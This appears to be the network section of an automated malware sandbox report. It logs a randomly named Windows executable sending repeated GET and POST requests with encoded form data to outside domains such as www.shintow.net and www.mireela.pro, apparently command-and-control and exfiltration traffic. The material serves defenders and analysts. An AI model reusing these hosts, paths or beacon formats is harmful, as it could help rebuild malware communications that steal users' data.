                                                                                                                                          0192.168.2.44973613.248.169.4880928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:02.765017986 CET409OUTGET /qq33/?n8C0=i6Dk+UJVjxglEXs3yzkq0WHG0TlItVmV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnnUFlXdFi4jtVVDEc70mVXkLEkzZ46s+tlcE=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.ila.beauty
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:28:03.423393011 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 38 43 30 3d 69 36 44 6b 2b 55 4a 56 6a 78 67 6c 45 58 73 33 79 7a 6b 71 30 57 48 47 30 54 6c 49 74 56 6d 56 39 46 70 4f 69 68 68 53 34 7a 69 46 41 7a 48 6d 49 6a 66 7a 46 6e 59 61 76 38 4f 51 63 70 55 76 64 4d 66 57 6d 32 47 58 49 31 63 78 57 4d 39 67 74 4e 56 6e 6e 55 46 6c 58 64 46 69 34 6a 74 56 56 44 45 63 37 30 6d 56 58 6b 4c 45 6b 7a 5a 34 36 73 2b 74 6c 63 45 3d 26 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n8C0=i6Dk+UJVjxglEXs3yzkq0WHG0TlItVmV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnnUFlXdFi4jtVVDEc70mVXkLEkzZ46s+tlcE=&vva=cTUXfXqHQ4cd-Hh0"}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449737142.250.185.21180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:18.532887936 CET667OUTPOST /ow7i/ HTTP/1.1
                                                                                                                                          Host: www.shintow.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.shintow.net
                                                                                                                                          Referer: http://www.shintow.net/ow7i/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 63 33 30 6e 55 61 59 65 6e 52 4e 4b 6e 38 2f 72 58 6d 64 35 67 6d 65 70 45 4a 34 33 71 6d 64 4f 4b 63 2f 6d 30 43 4c 41 63 6b 69 53 56 75 50 41 2b 52 32 67 42 4b 2b 70 6c 64 6c 75 6e 78 52 43 58 57 66 48 52 6e 31 51 4f 75 46 37 76 6d 47 6b 61 75 4c 70 61 74 52 66 48 75 4d 31 58 62 6b 53 34 68 62 4b 36 69 6f 44 4c 48 73 39 78 71 64 67 4c 64 42 7a 4c 5a 46 5a 51 63 42 5a 63 54 4e 65 31 49 2f 70 6a 39 50 67 41 71 38 53 34 71 72 36 6a 68 46 47 63 38 32 56 45 39 2f 75 4a 4d 45 55 4f 73 46 58 56 51 6c 51 4c 57 6b 6c 5a 75 36 4d 48 46 31 44 67 3d 3d
                                                                                                                                          Data Ascii: n8C0=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFGc82VE9/uJMEUOsFXVQlQLWklZu6MHF1Dg==
                                                                                                                                          Nov 14, 2024 16:28:19.469888926 CET401INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Content-Type: application/binary
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:19 GMT
                                                                                                                                          Location: https://www.shintow.net/ow7i/
                                                                                                                                          Server: ESF
                                                                                                                                          Content-Length: 0
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449740142.250.185.21180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:21.074604034 CET687OUTPOST /ow7i/ HTTP/1.1
                                                                                                                                          Host: www.shintow.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.shintow.net
                                                                                                                                          Referer: http://www.shintow.net/ow7i/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 34 4c 30 6c 33 69 59 66 48 52 4d 46 48 38 2f 68 33 6d 5a 35 67 71 65 70 46 39 6f 32 5a 43 64 4f 6f 55 2f 33 46 43 4c 44 63 6b 69 61 31 76 4c 64 4f 52 39 67 42 50 42 70 67 39 6c 75 6e 6c 52 43 53 53 66 48 6d 7a 30 43 75 75 44 79 50 6d 49 71 36 75 4c 70 61 74 52 66 47 4b 69 31 57 7a 6b 53 4a 52 62 4c 62 69 72 41 4c 48 76 74 68 71 64 72 72 64 46 7a 4c 5a 37 5a 55 64 4a 5a 65 72 4e 65 32 63 2f 73 69 39 51 31 77 71 41 66 59 72 4a 2b 53 4d 42 45 4e 59 35 51 57 52 78 6b 49 30 72 52 49 68 66 47 6b 78 79 43 4c 79 58 34 65 6e 4f 42 45 34 38 59 70 66 56 52 61 69 52 4d 4a 6b 37 78 61 68 65 67 75 2b 49 51 77 67 3d
                                                                                                                                          Data Ascii: n8C0=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZCdOoU/3FCLDckia1vLdOR9gBPBpg9lunlRCSSfHmz0CuuDyPmIq6uLpatRfGKi1WzkSJRbLbirALHvthqdrrdFzLZ7ZUdJZerNe2c/si9Q1wqAfYrJ+SMBENY5QWRxkI0rRIhfGkxyCLyX4enOBE48YpfVRaiRMJk7xahegu+IQwg=
                                                                                                                                          Nov 14, 2024 16:28:22.036875010 CET401INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Content-Type: application/binary
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:21 GMT
                                                                                                                                          Location: https://www.shintow.net/ow7i/
                                                                                                                                          Server: ESF
                                                                                                                                          Content-Length: 0
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449756142.250.185.21180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:23.624396086 CET10769OUTPOST /ow7i/ HTTP/1.1
                                                                                                                                          Host: www.shintow.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.shintow.net
                                                                                                                                          Referer: http://www.shintow.net/ow7i/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 34 4c 30 6c 33 69 59 66 48 52 4d 46 48 38 2f 68 33 6d 5a 35 67 71 65 70 46 39 6f 32 5a 4b 64 4f 64 41 2f 6c 57 61 4c 4d 38 6b 69 47 6c 76 47 64 4f 52 61 67 41 72 4e 70 67 35 54 75 6b 64 52 42 77 61 66 42 58 7a 30 4a 75 75 44 74 66 6d 46 6b 61 75 6b 70 61 39 56 66 48 36 69 31 57 7a 6b 53 4b 35 62 50 4b 69 72 50 72 48 73 39 78 71 5a 67 4c 64 39 7a 4c 42 72 5a 55 52 5a 5a 4f 4c 4e 64 57 4d 2f 72 41 6c 51 33 51 71 34 63 59 72 76 2b 53 41 4f 45 4e 46 49 51 53 51 61 6b 49 51 72 64 76 38 38 44 57 59 73 44 61 57 35 73 39 58 46 49 32 6f 34 65 71 69 74 58 4c 69 71 62 74 67 56 78 61 30 35 34 4f 69 78 54 6c 2b 33 62 36 4c 4a 63 77 36 59 54 34 51 74 69 69 7a 70 36 4a 6d 2b 51 49 36 54 2f 75 4f 39 6f 2f 58 44 64 57 50 6b 56 37 54 64 42 4c 71 4b 44 44 68 70 76 44 2f 35 77 75 30 72 4b 33 6c 6f 59 30 34 6d 48 64 71 5a 61 70 43 72 68 33 2f 51 56 49 4c 63 79 54 41 63 2b 56 62 46 63 73 69 33 51 48 2b 52 57 51 49 39 73 31 4d 6c 31 4b 48 35 61 75 36 53 42 57 4d 6b 79 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZKdOdA/lWaLM8kiGlvGdORagArNpg5TukdRBwafBXz0JuuDtfmFkaukpa9VfH6i1WzkSK5bPKirPrHs9xqZgLd9zLBrZURZZOLNdWM/rAlQ3Qq4cYrv+SAOENFIQSQakIQrdv88DWYsDaW5s9XFI2o4eqitXLiqbtgVxa054OixTl+3b6LJcw6YT4Qtiizp6Jm+QI6T/uO9o/XDdWPkV7TdBLqKDDhpvD/5wu0rK3loY04mHdqZapCrh3/QVILcyTAc+VbFcsi3QH+RWQI9s1Ml1KH5au6SBWMkyUcoAaixcf3hkHJqFFow+6FXUsXS7T4iW6CoHayTcbYa92336I47zDjB0SFVBs29sxjFcAjjg4IlkHkuupO3h/JEPYMVDLQRGO+ECvDTJHWT3ZYm5YyAM4VKEMXsKzeIOgXTyYIvD/GGqAMYfoDKyBcD+lRSyPXyTxwV/P3ZGWz02vff+2gTU9gynIqoCgLQat+/kON5CO1ppFPJFvB6LRSrKqfBhHOopn7k98fEKcXW8gTv8vz/i85AJeS+EdE5wsERpaKCRclAQjLywpZN9B9ipczOusXl7voq+XdiXUZkF7Dgr8II+egKLlTZidsla7uw8qEKORVRKyHfPtRwGE3c5PjR8aCXpdZsp+hjiEu15kU+Y95099+KDo43LqsOFqINzZy2Riv/yGAnke0yyCH0/6ZQmPTckhHLwZW8aJkMEWZbWgZZT0jgqlipIvosjIr33OnDbTML32NbmelsEi8nXEfLp7tpA+KvHJgtlVwiMtwKPRAisq6T0DvwmuoFEn1Y6lo92ZhHdaLiCGJEoOm6GsFTWR9Tz8Q02QKzb+bZc2lvItlR/V4Rq4Rz5rw6erAKQB1xVXdguFMXeGUv9l8NITCDSvUhfzKt9GjuDLUFuyUtNoRX+2AeVcquw3NjgUQgO3Ix83xI8LUHhFGaGqcShU/d2CsmsDV [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:28:24.569091082 CET401INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Content-Type: application/binary
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:24 GMT
                                                                                                                                          Location: https://www.shintow.net/ow7i/
                                                                                                                                          Server: ESF
                                                                                                                                          Content-Length: 0
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.449772142.250.185.21180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:26.161971092 CET410OUTGET /ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GHI6X7o+Jv/ajj5xRJEPvwXTFBId4ErrvEIs=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.shintow.net
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:28:27.121997118 CET550INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Content-Type: application/binary
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:26 GMT
                                                                                                                                          Location: https://www.shintow.net/ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GHI6X7o+Jv/ajj5xRJEPvwXTFBId4ErrvEIs%3D&vva=cTUXfXqHQ4cd-Hh0
                                                                                                                                          Server: ESF
                                                                                                                                          Content-Length: 0
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.44980669.57.163.22780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:32.295607090 CET667OUTPOST /mdol/ HTTP/1.1
                                                                                                                                          Host: www.mireela.pro
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mireela.pro
                                                                                                                                          Referer: http://www.mireela.pro/mdol/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 76 73 34 37 34 49 7a 7a 43 6c 79 44 39 71 73 35 70 42 31 33 58 4c 4c 34 4f 78 45 6c 32 56 2f 36 77 71 36 6f 6e 38 6f 52 34 2f 32 7a 76 78 65 42 51 2f 47 58 43 6e 30 75 33 4d 4e 50 31 6f 50 65 4a 64 56 33 59 62 62 76 32 78 31 78 4e 48 2f 50 6c 35 52 6e 32 34 32 68 35 52 2b 34 66 50 4e 76 39 66 75 71 7a 6b 69 44 55 31 6e 45 4c 56 56 34 55 49 6e 66 67 55 33 4f 54 34 68 79 32 4a 5a 39 47 4d 35 76 55 6d 77 72 79 41 59 79 54 34 55 6c 79 61 6d 6e 50 6b 4a 5a 69 53 79 44 73 6f 50 45 66 74 55 38 65 64 43 68 51 47 73 6d 7a 62 6f 6f 36 30 78 71 72 41 3d 3d
                                                                                                                                          Data Ascii: n8C0=FD5fONH9UoGPvs474IzzClyD9qs5pB13XLL4OxEl2V/6wq6on8oR4/2zvxeBQ/GXCn0u3MNP1oPeJdV3Ybbv2x1xNH/Pl5Rn242h5R+4fPNv9fuqzkiDU1nELVV4UInfgU3OT4hy2JZ9GM5vUmwryAYyT4UlyamnPkJZiSyDsoPEftU8edChQGsmzboo60xqrA==
                                                                                                                                          Nov 14, 2024 16:28:32.963535070 CET959INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:32 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 815
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.44981969.57.163.22780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:34.836637020 CET687OUTPOST /mdol/ HTTP/1.1
                                                                                                                                          Host: www.mireela.pro
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mireela.pro
                                                                                                                                          Referer: http://www.mireela.pro/mdol/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 67 76 67 37 36 70 7a 7a 4f 56 79 63 68 61 73 35 67 68 30 2b 58 4c 48 34 4f 30 38 50 32 6e 62 36 77 4c 4b 6f 6d 35 49 52 2f 2f 32 7a 37 68 65 4f 66 66 47 4d 43 6e 34 49 33 4a 4e 50 31 72 7a 65 4a 63 6c 33 62 73 48 73 31 42 31 6b 4d 33 2f 4a 72 5a 52 6e 32 34 32 68 35 56 76 6c 66 50 56 76 36 73 6d 71 38 6c 69 41 64 56 6e 4c 64 46 56 34 51 49 6e 62 67 55 33 67 54 39 4a 4d 32 4c 68 39 47 4a 56 76 55 79 6b 6f 34 41 59 4f 4e 49 56 63 37 59 44 52 4a 30 34 6e 72 43 71 52 70 6f 2f 54 61 72 5a 6d 50 73 6a 32 43 47 49 56 75 63 68 63 33 33 4d 6a 77 41 50 38 35 78 36 37 58 6a 33 64 6b 4a 57 41 2b 77 74 74 59 76 73 3d
                                                                                                                                          Data Ascii: n8C0=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nb6wLKom5IR//2z7heOffGMCn4I3JNP1rzeJcl3bsHs1B1kM3/JrZRn242h5VvlfPVv6smq8liAdVnLdFV4QInbgU3gT9JM2Lh9GJVvUyko4AYONIVc7YDRJ04nrCqRpo/TarZmPsj2CGIVuchc33MjwAP85x67Xj3dkJWA+wttYvs=
                                                                                                                                          Nov 14, 2024 16:28:35.514314890 CET959INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:35 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 815
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.44983469.57.163.22780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:28:37.389938116 CET10769OUTPOST /mdol/ HTTP/1.1
                                                                                                                                          Host: www.mireela.pro
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.mireela.pro
                                                                                                                                          Referer: http://www.mireela.pro/mdol/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 67 76 67 37 36 70 7a 7a 4f 56 79 63 68 61 73 35 67 68 30 2b 58 4c 48 34 4f 30 38 50 32 6e 54 36 77 35 43 6f 70 34 49 52 2b 2f 32 7a 34 68 65 61 66 66 47 4e 43 6b 49 45 33 4a 49 74 31 75 33 65 54 2b 74 33 50 4e 48 73 75 78 31 6b 4a 48 2f 4d 6c 35 51 6e 32 34 6d 6c 35 52 7a 6c 66 50 56 76 36 71 43 71 31 55 69 41 52 31 6e 45 4c 56 56 30 55 49 6e 6a 67 56 65 64 54 39 4e 63 33 2f 56 39 46 70 46 76 62 68 4d 6f 2b 51 59 4d 4d 49 56 74 37 59 2f 43 4a 30 56 57 72 42 32 2f 70 72 6a 54 58 39 38 35 59 73 72 39 62 48 6b 33 7a 64 68 38 36 6e 39 75 7a 54 58 43 35 7a 36 51 43 78 2f 33 6f 35 72 53 6b 42 31 4f 61 62 54 73 6c 72 7a 33 48 38 4a 4c 6d 6a 6c 32 65 4e 4e 77 65 7a 67 75 76 65 57 57 52 31 64 63 32 64 51 39 56 33 4b 49 6a 36 6b 30 58 44 6d 62 54 6f 77 4e 57 39 72 4c 37 69 4a 61 56 34 44 61 65 4c 39 4b 4b 4d 76 36 64 55 46 7a 51 78 2b 33 59 7a 6a 53 38 55 69 57 4d 31 68 37 49 4b 55 52 67 52 61 48 76 33 33 4f 72 76 49 4c 76 77 42 2b 44 4a 33 79 51 53 63 4b 70 [TRUNCATED]
